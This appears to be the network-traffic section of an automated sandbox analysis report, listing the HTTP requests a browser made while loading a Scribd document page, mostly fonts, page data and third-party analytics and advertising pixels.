Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0002.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0003.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0004.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0005.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/2-9725faf5fd.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/3-4383b92e84.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0006.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/4-fb0a36a95f.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0008.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0009.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0010.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0012.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0013.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0011.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /ccm/collect?en=page_view&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&scrsrc=www.googletagmanager.com&frm=0&rnd=1864411124.1739863009&dt=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&auid=940495529.1739863009&navt=n&npa=0&gtm=45He52d0v78386455za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102067808~102482432~102539968~102558064~102587591~102605417~102640600&tft=1739863008867&tfd=5817&apve=1&apvf=sb HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /A3071581-5350-42cd-80be-79cdd173e0991.js HTTP/1.1Host: utt.impactcdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ping.min.js HTTP/1.1Host: cdn.pdst.fmConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i18n/pixel/events.js?sdkid=C8LT3611P6OF1JAH7LT0&lib=ttq HTTP/1.1Host: analytics.tiktok.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /wi/ytc.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /a-05td.min.js HTTP/1.1Host: b-code.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /log/dd HTTP/1.1Host: wa.scribd.comConnection: keep-aliveContent-Length: 172sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /log/dd HTTP/1.1Host: wa.scribd.comConnection: keep-aliveContent-Length: 170sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /log/dd HTTP/1.1Host: wa.scribd.comConnection: keep-aliveContent-Length: 189sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/v3/graphql HTTP/1.1Host: api.scribd.comConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js HTTP/1.1Host: survey.survicate.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /js/24721610109.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /v1/ingest HTTP/1.1Host: pixels.spotify.comConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /s.js HTTP/1.1Host: cdn.siftscience.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixels/t2_9t33vcn2/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i18n/pixel/static/main.MWY1YTg3NzcyMQ.js HTTP/1.1Host: analytics.tiktok.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _ttp=2tCjaG9bXmYux1DJ121zI6Lcamx
Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1739863011367&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=3db7dcde-f710-4d9a-a231-37baf4e66c84&aaid=&em=&external_id=&idfa=&integration=reddit&partner=&opt_out=0&sh=1280&sw=1024&v=rdt_4a8557f4&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /scribd-com/pubfig.min.js HTTP/1.1Host: a.pub.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /7.19.0/bundle.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /wi/config/10143699.json HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
